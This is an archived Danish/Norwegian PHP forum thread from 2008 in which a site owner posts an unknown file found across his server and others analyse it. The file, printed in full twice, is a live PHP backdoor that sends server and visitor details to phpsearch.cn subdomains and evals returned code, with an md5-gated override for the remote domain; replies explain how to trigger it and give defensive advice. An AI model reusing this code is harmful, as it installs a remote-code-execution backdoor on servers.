/ Forside / Teknologi / Udvikling / PHP / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
PHP
#NavnPoint
rfh 3959
natmaden 3372
poul_from 3310
funbreak 2700
stone47 2230
Jin2k 1960
Angband 1743
Bjerner 1249
refi 1185
10  Interkril.. 1146
Hva er dette? ukjent fil funnet på min ser~
Fra : retttilstephen@gmail~


Dato : 04-12-08 06:32

Hei!
Kan noen gi et hint om hva denne koden gjør for funksjon evt skade??:
Den er sannsynligvis lastet opp av en intern bruker på min server.

Takk!

<? error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:
$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:
$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:
$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:
$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:
$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:
$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:
$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER
["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode
($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode
($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode
($i).".".base64_encode($j);
$f=base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST
["q"])=="9123d0e5f518edcb75fd470d3bfa27c4") $f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval
($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close
($cu);eval($o);}; ?>

 
 
Martin (04-12-2008)
Kommentar
Fra : Martin


Dato : 04-12-08 14:50

retttilstephen@gmail.com wrote:
> Hei!
> Kan noen gi et hint om hva denne koden gjør for funksjon evt skade??:
> Den er sannsynligvis lastet opp av en intern bruker på min server.
>
> Takk!

Hvis du ikke selv har lavet den fil, eller har et eller andet cms/blog,
så ville jeg slette den IMMEDIATELY!

Det den gør, den kalder op til til en eller anden adresse, med en masse
oplysninger om dig, og din bruger

Gider ikke lige sidde og decode det, for at se hvor det er den kalder op til

>
> <? error_reporting(0);
> $a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
> $b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:
> $SERVER_NAME);
> $c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:
> $REQUEST_URI);
> $d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
> $e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:
> $QUERY_STRING);
> $f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:
> $HTTP_REFERER);
> $g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:
> $HTTP_USER_AGENT);
> $h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:
> $REMOTE_ADDR);
> $i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:
> $SCRIPT_FILENAME);
> $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER
> ["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
> $z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode
> ($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode
> ($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode
> ($i).".".base64_encode($j);
> $f=base64_decode("cGhwc2VhcmNoLmNu");
> if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST
> ["q"])=="9123d0e5f518edcb75fd470d3bfa27c4") $f=$_REQUEST["id"];
> if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));
> else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval
> ($c);
> else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
> curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close
> ($cu);eval($o);}; ?>

Dan Storm (04-12-2008)
Kommentar
Fra : Dan Storm


Dato : 04-12-08 15:13

retttilstephen@gmail.com skrev:
> Hei!
> Kan noen gi et hint om hva denne koden gjør for funksjon evt skade??:
> Den er sannsynligvis lastet opp av en intern bruker på min server.

Well, jeg er ikke bange af mig, så jeg har lige smidt det på serveren,
skilt det lidt ad og givet det et skud ;)

Den forsøger at sende en masse informationer omrking hvilken side du er
på videre til http://ads1.phpsearch.cn
Besøger man siden får du en site der umiddelbart virker som om formålet
er at tjene penge via online reklamer.
For at du ikke skal få mistanke viser den så en 404 side som umiddelbart
skulle få det til at virke som om siden ikke er fundet (altså, som om
filen ikke eksisterer og dermed mindre chance for at du opdager den).

Men det lader ikke til at den er skadelig, men hvem gider at lægge
trafik til sådan noget... Anyways, en god opsætning gør at scriptet ikke
kan eksekveres effektivt.

--
Dan Storm - storm at err0r dot dk / http://err0r.dk

Tro ikke brugerne vil gøre noget for at undgå dit killfilter
- Så vigtig er du heller ikke!

Stig Johansen (04-12-2008)
Kommentar
Fra : Stig Johansen


Dato : 04-12-08 16:05

Dan Storm wrote:

> retttilstephen@gmail.com skrev:
>> Hei!
>> Kan noen gi et hint om hva denne koden gjør for funksjon evt skade??:
>> Den er sannsynligvis lastet opp av en intern bruker på min server.

Ikke nødvendigvis. Den kan også være kommet ind ad andre veje.

> Den forsøger at sende en masse informationer omrking hvilken side du er
> på videre til http://ads1.phpsearch.cn
Eller http://71.phpsearch.cn
eller http://7.phpsearch.cn

> Men det lader ikke til at den er skadelig,

Du har overset disse 2 småting:
eval($c);
og
eval($o);

Dvs. evt returneret PHP kode bliver udført.

> men hvem gider at lægge
> trafik til sådan noget...

Det er ikke alle ejere af servere, der ved de lægger plads til sådan noget.
Formentlig alle intermidiate layers kører på inficerede servere (så
bagmændene ikke kan spores)

--
Med venlig hilsen
Stig Johansen

Dan Storm (04-12-2008)
Kommentar
Fra : Dan Storm


Dato : 04-12-08 16:29

Stig Johansen skrev:
>> Den forsøger at sende en masse informationer omrking hvilken side du er
>> på videre til http://ads1.phpsearch.cn
> Eller http://71.phpsearch.cn
> eller http://7.phpsearch.cn

Så meget skilte jeg den heller ikke ad... :p

>> Men det lader ikke til at den er skadelig,
>
> Du har overset disse 2 småting:
> eval($c);
> og
> eval($o);
>
> Dvs. evt returneret PHP kode bliver udført.

Jeg kørte en var_dump() på det, men det lod ikke til at returnere noget?
Men igen, jeg kunne nok have skilt det mere ad.



> Det er ikke alle ejere af servere, der ved de lægger plads til sådan noget.
> Formentlig alle intermidiate layers kører på inficerede servere (så
> bagmændene ikke kan spores)

Ja, desværre... :/
En kollega jeg har havde et cronjob til at tjekke en gang i døgnet for
nyoprettede filer. Det virker måske lidt overkill, men idéen var god: på
den måde kunne han jo hurtigt finde filer som eventuelt har forsøgt at
deface hans website. Well, jeg har jo ikke noget liggende for tiden, så
jeg har ikke lige taget højde for så meget...

--
Dan Storm - storm at err0r dot dk / http://err0r.dk

Tro ikke brugerne vil gøre noget for at undgå dit killfilter
- Så vigtig er du heller ikke!

Stig Johansen (04-12-2008)
Kommentar
Fra : Stig Johansen


Dato : 04-12-08 16:48

Dan Storm wrote:

>> Det er ikke alle ejere af servere, der ved de lægger plads til sådan
>> noget. Formentlig alle intermidiate layers kører på inficerede servere
>> (så bagmændene ikke kan spores)
>
> Ja, desværre... :/
> En kollega jeg har havde et cronjob til at tjekke en gang i døgnet for
> nyoprettede filer. Det virker måske lidt overkill,

Overhovedet ikke.
Jeg har leget lidt med et koncept til at overvåge både nye og ændrede filer
samt SQL injection på MS SQLServer, og formålet er at køre _meget_
hyppigere.
<http://w-o-p-r.dk/storm.monitor/index.asp>

Nåh ja - Storm - jeg valgte at kalde det Storm Monitor, men det er nu
nærmere inspireret af Botnettet Storm, og ikke dig :)

> men idéen var god: på
> den måde kunne han jo hurtigt finde filer som eventuelt har forsøgt at
> deface hans website.

Præcis - og hvis alle gjorde det, havde vi ikke alt det lort liggende på
nettet.

--
Med venlig hilsen
Stig Johansen

Dan Storm (05-12-2008)
Kommentar
Fra : Dan Storm


Dato : 05-12-08 07:55

Stig Johansen skrev:
> Overhovedet ikke.
> Jeg har leget lidt med et koncept til at overvåge både nye og ændrede filer
> samt SQL injection på MS SQLServer, og formålet er at køre _meget_
> hyppigere.
> <http://w-o-p-r.dk/storm.monitor/index.asp>

Jeg har godt nok været inde og kigge på den og jeg synes idéen er god;
jeg skal jo nok have noget overvågning installeret på mit nye website,
når jeg ikke engang får nosset mig færdig med den :p

>
> Nåh ja - Storm - jeg valgte at kalde det Storm Monitor, men det er nu
> nærmere inspireret af Botnettet Storm, og ikke dig :)

Det ville dog være beærende, men jeg havde nu heller ikke regnet med det
var tilfældet hehe ;)

>
>> men idéen var god: på
>> den måde kunne han jo hurtigt finde filer som eventuelt har forsøgt at
>> deface hans website.
>
> Præcis - og hvis alle gjorde det, havde vi ikke alt det lort liggende på
> nettet.

Jeg tror bestemt du har ret - mængden af defacertools og andet skidt
ville være betydeligt mindre, hvis man havde et godt system til at
advisere mod noget uventet. Tror også hellere jeg må komme igang med at
lave noget...


--
Dan Storm - storm at err0r dot dk / http://err0r.dk

Tro ikke brugerne vil gøre noget for at undgå dit killfilter
- Så vigtig er du heller ikke!

Stig Johansen (05-12-2008)
Kommentar
Fra : Stig Johansen


Dato : 05-12-08 18:00

Dan Storm wrote:

> når jeg ikke engang får nosset mig færdig med den :p

Ja, det er lige det med at få nosset sig færdig :)
Jeg er selv lidt splittet med det her PHP, som kører serverside:
<http://w-o-p-r.dk/storm.monitor/storm.monitor.php.txt>
På den ene side, så er det ufatteligt grimt, men på den anden side, så er
det i videst muligt omfang genbrug af et delelement af namogofer'eren (the
bad guys).

Det kan godt være jeg er lidt mærkelig, men jeg synes der er lidt humor i at
bruge deres eget 'våben' mod dem selv - deraf den grimme kode.

> Jeg tror bestemt du har ret - mængden af defacertools og andet skidt
> ville være betydeligt mindre, hvis man havde et godt system til at
> advisere mod noget uventet.

Og redirection sites, og phishing sites, og placeholders, og spam runs,
og...

> Tror også hellere jeg må komme igang med at
> lave noget...

God ide - hvis du søger på nettet, findes der mange historier om folk der
har fundet mærkelige filer på deres servere, analogt med OP.

Lad mig lige rekapitulere til OP:
Sørg for at finde ud af _hvordan_ den fil er landet på dit system.
At slette den er fint, men hvis ikke 'hullet' er lukket, så kommer den igen.

--
Med venlig hilsen
Stig Johansen

N/A (06-12-2008)
Kommentar
Fra : N/A


Dato : 06-12-08 20:07



N/A (06-12-2008)
Kommentar
Fra : N/A


Dato : 06-12-08 20:07



ScooterGrisen (04-12-2008)
Kommentar
Fra : ScooterGrisen


Dato : 04-12-08 15:02

Her kan i se hvad den outputtet og sender: http://mentos.wep.dk/scooterhjemmeside/php/test1.php

Den del af kildekoden hvor der står md5 det må vel være et krypteret
password er det ik ?
Ligesom at scriptet logger på phpsearch.cn og logger på og aflevere de
øverste data på test1.php

Der var en der uploadet et php script til min hjemmeside som slettede
filer så hvis der var nogen der uploadet det der script så ville jeg
ikke have de kunne udfører det.

Jeg har gjort så php kode bliver vist som almindelig tekst på min
hjemmeside, så de kan uploade php men ikke udfører det.
Se f.eks: http://mentos.wep.dk/scooterhjemmeside/download/upload/test.php

Stig Johansen (05-12-2008)
Kommentar
Fra : Stig Johansen


Dato : 05-12-08 06:05

ScooterGrisen wrote:

> Her kan i se hvad den outputtet og sender:
> http://mentos.wep.dk/scooterhjemmeside/php/test1.php

Det skal du nu ikke være sikker på.

> Den del af kildekoden hvor der står md5 det må vel være et krypteret
> password er det ik ?

Næsten, hashet 'password' er nok mere rigtigt.

> Ligesom at scriptet logger på phpsearch.cn og logger på og aflevere de
> øverste data på test1.php

Ikke nødvendigvis.
Bemærk linien her:
$f=base64_decode("cGhwc2VhcmNoLmNu");
Den sætter $f til phpsearch.cn initielt.

Men hvis vi kigger på linien:
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST
["q"])=="9123d0e5f518edcb75fd470d3bfa27c4") $f=$_REQUEST["id"];

Medfører det, at hvis den bliver kaldt med den rigtige 'q', så bliver $f sat
til 'id'.

'Man' kan altså kalde scriptet med
scriptets_navn?q=<secret>&id=the.real.bad.domaine

Så vil $f indeholde the.real.bad.domaine og ikke phpsearch.cn.
Dermed vil den kalde, måske, http://71.the.real.bad.domaine.. + data

Resultatet af den efterfølgende get.. eller curl.. vil blive eksekveret med
eval.

Forretningsgangen er at svineørerne finder et (nyt) domaine (navn).
Her lægger de den kode, de ønsker udført på din server.
Så konfigurerer man bot'erne til at udføre requests med disse data på de
servere, der ligger i deres 'dictionary'.

Nettoresultatet er, at den server, der indeholder skadelig kode, og kunne
være sporbar, ikke fremgår nogle steder, bortset fra serverens logfil.

Hvis man vel og mærket logger, gemmer, og analyserer Querystring (det, der
står efter ?).

--
Med venlig hilsen
Stig Johansen

Stig Johansen (05-12-2008)
Kommentar
Fra : Stig Johansen


Dato : 05-12-08 06:11

Stig Johansen wrote:

> Men hvis vi kigger på linien:
> if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST
> ["q"])=="9123d0e5f518edcb75fd470d3bfa27c4") $f=$_REQUEST["id"];

Kom lige i tanke om, hvis der er nogen der ønsker at lege med ilden.
Der er vistnok md5 generatorer online, men ellers har jeg en lille en her:
<http://w-o-p-r.dk/wopr.tools/wopr.md5.generator.asp>

En md5 på the_evil giver:
0608a1c41eca47c6381ef94048203079

Hvis man indsætter det i if sætningen, så kan man teste scriptet med
?q=the_evil&id=det.domaine.du.vil.kalde

--
Med venlig hilsen
Stig Johansen

ScooterGrisen (05-12-2008)
Kommentar
Fra : ScooterGrisen


Dato : 05-12-08 13:24

Hvis nu jeg skriver hejsa i md5 sum generatoren så får jeg
478ac43056d0bbfedd52a1c806c9a16c.
Men hvad skal man bruge det til og kan man decode
478ac43056d0bbfedd52a1c806c9a16c ?

Jeg ved at md5 bruges til at checke om downloadet filer er blevet
korrekt downloadet eller om der er sket en fejl.
Har MD5 noget med passwords at gøre ?

Stig Johansen (06-12-2008)
Kommentar
Fra : Stig Johansen


Dato : 06-12-08 02:41

"ScooterGrisen" <fedblindkat@yahoo.dk> wrote in message
news:088cd9bc-58dd-46e4-bb1f-6aa9806ed83e@s9g2000prg.googlegroups.com...
>Hvis nu jeg skriver hejsa i md5 sum generatoren så får jeg
>478ac43056d0bbfedd52a1c806c9a16c.
>Men hvad skal man bruge det til og kan man decode
>478ac43056d0bbfedd52a1c806c9a16c ?

Nej, MD5 er en envejs hash, og kan ikke dekrypteres.
I det her tilfælde med filen fra OP, kan du rette
.... md5($_REQUEST
["q"])=="9123d0e5f518edcb75fd470d3bfa27c4") ...
til
.... md5($_REQUEST
["q"])=="478ac43056d0bbfedd52a1c806c9a16c") ...
så vil stumpen blive udført hvis man kalder den med id=hejsa

>Jeg ved at md5 bruges til at checke om downloadet filer er blevet
>korrekt downloadet eller om der er sket en fejl.
>Har MD5 noget med passwords at gøre ?

Ja, også til det. Man kan typisk gemme MD5 af password i databaserne, så det
ikke fremgår i klartekst.

--
Med venlig hilsen/Best regards
Stig Johansen




Stig Johansen (06-12-2008)
Kommentar
Fra : Stig Johansen


Dato : 06-12-08 03:24

"Stig Johansen" <wopr.dk@gmail.com> wrote in message
news:4939d771$0$90263$14726298@news.sunsite.dk...
> "ScooterGrisen" <fedblindkat@yahoo.dk> wrote in message
> news:088cd9bc-58dd-46e4-bb1f-6aa9806ed83e@s9g2000prg.googlegroups.com...
> I det her tilfælde med filen fra OP, kan du rette
> ... md5($_REQUEST
> ["q"])=="9123d0e5f518edcb75fd470d3bfa27c4") ...
> til
> ... md5($_REQUEST
> ["q"])=="478ac43056d0bbfedd52a1c806c9a16c") ...
> så vil stumpen blive udført hvis man kalder den med id=hejsa

Skulle have været q=hejsa

--
Med venlig hilsen/Best regards
Stig Johansen




Martin (06-12-2008)
Kommentar
Fra : Martin


Dato : 06-12-08 20:07

ScooterGrisen wrote:
> Hvis nu jeg skriver hejsa i md5 sum generatoren så får jeg
> 478ac43056d0bbfedd52a1c806c9a16c.
> Men hvad skal man bruge det til og kan man decode
> 478ac43056d0bbfedd52a1c806c9a16c ?

Nogle gange, der findes noget der kaldes Rainbow tables, som faktisk
bare er ord, som bruger har sat ind, også er MD5 koden fundet for det
også blevet sat ind.

Så hvis man søger efter
478ac43056d0bbfedd52a1c806c9a16c
giver det
hejsa

I det oprindelige script bliver
9123d0e5f518edcb75fd470d3bfa27c4
brugt, men denne findes desværre ikke i den rainbow table jeg lige søger i.

http://md5.rednoize.com/
(virker også med SHA1)

Stig Johansen (07-12-2008)
Kommentar
Fra : Stig Johansen


Dato : 07-12-08 10:50

"Martin" <martin@aarhof.invalid> wrote in message
news:493acd75$0$90266$14726298@news.sunsite.dk...
> Nogle gange, der findes noget der kaldes Rainbow tables, som faktisk
> bare er ord, som bruger har sat ind, også er MD5 koden fundet for det
> også blevet sat ind.
>
> Så hvis man søger efter
> 478ac43056d0bbfedd52a1c806c9a16c
> giver det
> hejsa
>
> I det oprindelige script bliver
> 9123d0e5f518edcb75fd470d3bfa27c4
> brugt, men denne findes desværre ikke i den rainbow table jeg lige søger
i.
>
> http://md5.rednoize.com/
> (virker også med SHA1)

Det var da godt nok den mest usmagelige service jeg nogen sinde har set
eksponeret på internettet - håber ikke du er en del af det.
Har du fundet - eller oprettet den entry, du refererer (hejsa) ?

Hvem opretter hvad, og hvorfor ?

Namogofer'en bruger:
aace99428c50dbe965acc93f3f275cd3
Som tilsyneladende er:
Ox93Mdpqme8s

Men da den kan skifte identitet over tid, kan man ikke bruge det til noget.

--
Med venlig hilsen/Best regards
Stig Johansen




Johan Holst Nielsen (08-12-2008)
Kommentar
Fra : Johan Holst Nielsen


Dato : 08-12-08 13:58

Stig Johansen wrote:
> Det var da godt nok den mest usmagelige service jeg nogen sinde har set
> eksponeret på internettet - håber ikke du er en del af det.

Tjah - usmagelig og usmagelig. Jeg har ikke det store problem med den.

> Har du fundet - eller oprettet den entry, du refererer (hejsa) ?

Vil gætte på de blot har kørt en masse tekster ind.

> Hvem opretter hvad, og hvorfor ?

Hvis du klikker "switch mode" - og skriver "Stig" - så får du en MD5
hash af Stig ;) Den næste der søger præcis på den md5 hash vil få at
vide det svarer til sitg.

> Namogofer'en bruger:
> aace99428c50dbe965acc93f3f275cd3
> Som tilsyneladende er:
> Ox93Mdpqme8s

Det er *også* det - men det kan også være alt muligt andet.
En MD5 er ikke unik. Altså - 2 ord kan sagnes have den samme MD5 sum.

> Men da den kan skifte identitet over tid, kan man ikke bruge det til noget.

Tjah - og hvad der kommer ud af af "reverse" md5'en giver ikke den det
store resultat. I mange tilfælde er der jo f.eks. tilføjet salt til en
md5 hashing. Og så får du ikke det korrekte resultat i ovestående link.

--
Johan Holst Nielsen
Freelance PHP Developer - http://phpgeek.dk

Leif Neland (22-02-2009)
Kommentar
Fra : Leif Neland


Dato : 22-02-09 01:18

Stig Johansen skrev:
> "Martin" <martin@aarhof.invalid> wrote in message
> news:493acd75$0$90266$14726298@news.sunsite.dk...
>> Nogle gange, der findes noget der kaldes Rainbow tables, som faktisk
>> bare er ord, som bruger har sat ind, også er MD5 koden fundet for det
>> også blevet sat ind.
>>
>> Så hvis man søger efter
>> 478ac43056d0bbfedd52a1c806c9a16c
>> giver det
>> hejsa
>>
>> I det oprindelige script bliver
>> 9123d0e5f518edcb75fd470d3bfa27c4
>> brugt, men denne findes desværre ikke i den rainbow table jeg lige søger
> i.
>> http://md5.rednoize.com/
>> (virker også med SHA1)
>
> Det var da godt nok den mest usmagelige service jeg nogen sinde har set
> eksponeret på internettet - håber ikke du er en del af det.
> Har du fundet - eller oprettet den entry, du refererer (hejsa) ?
>
(Gammelt indlæg, undskyld)

Det kan være man skulle bruge ledig kapacitet til at fylde tilfældigt
genererede ord ind i den service.

Bare blive ved med at kalde den rekursivt. Så kan de dumme
hacker-wannabe´s ikke bruge den til noget, da uendeligt mange
bogstavkombinationer kan give den samme md5. Og databasen kan blive
fyldt op...

Leif

N/A (06-12-2008)
Kommentar
Fra : N/A


Dato : 06-12-08 20:07



Stephen (09-12-2008)
Kommentar
Fra : Stephen


Dato : 09-12-08 07:43

Takk for alle innspill.

Jeg har nå underøkt serveren nøyere og funnet ut at det har blitt lagt
samme fil i ALLE MAPPER!!!!!! ( 571 stk!!)) ( Med ulike navn som alle
har det til felles at de har ca 6 siffer.php - f.eks. "196240.php"

Har en stor slette-jobb foran meg - og ukjent hvilke fare dette
scriptet kan ha avstedkommet allerede.

-SR

Stig Johansen (09-12-2008)
Kommentar
Fra : Stig Johansen


Dato : 09-12-08 17:03

Stephen wrote:

> Jeg har nå underøkt serveren nøyere og funnet ut at det har blitt lagt
> samme fil i ALLE MAPPER!!!!!! ( 571 stk!!)) ( Med ulike navn som alle
> har det til felles at de har ca 6 siffer.php - f.eks. "196240.php"

Ja, de har det med at lægge skidtet alle steder fra roden og nedefter.

> Har en stor slette-jobb foran meg - og ukjent hvilke fare dette
> scriptet kan ha avstedkommet allerede.

Gør dig selv den tjeneste at kontrollere, eller i det mindste lave
stikprøvekontrol på, dine normale PHP/HTM(L) sider.

Det er ikke umuligt der også er røget nogle <script>/<iframe> tags ind dér.

--
Med venlig hilsen
Stig Johansen

Martin Larsen (11-12-2008)
Kommentar
Fra : Martin Larsen


Dato : 11-12-08 00:40

Hej

Er lidt nysgerrig. Hvad hedder din webhost? Skulle det mon være Servage?

Hilsen
Martin

Stephen (13-12-2008)
Kommentar
Fra : Stephen


Dato : 13-12-08 10:44

On 11 Dec., 00:39, Martin Larsen <w...@no.spam> wrote:
> Hej
>
> Er lidt nysgerrig. Hvad hedder din webhost? Skulle det mon være Servage?
>
> Hilsen
> Martin


Webhost'en er servetheworld.com (norsk-basert firma).

Etter nærmere ettersyn var kun de fleste (ikke alle) mapper infiserte.
Endel av mappene var knyttet til uploadscript for brukerne - og det er
måske der uvesenet har kommet seg inn ( til tross for at hele området
ligger bak passordbeskyttet område - beskyttet med Needsecure (http://
needsecure.com/) - som jeg forøvrig er meget fornøyd med.

Søg
Reklame
Statistik
Spørgsmål : 177549
Tips : 31968
Nyheder : 719565
Indlæg : 6408820
Brugere : 218887

Månedens bedste
Årets bedste
Sidste års bedste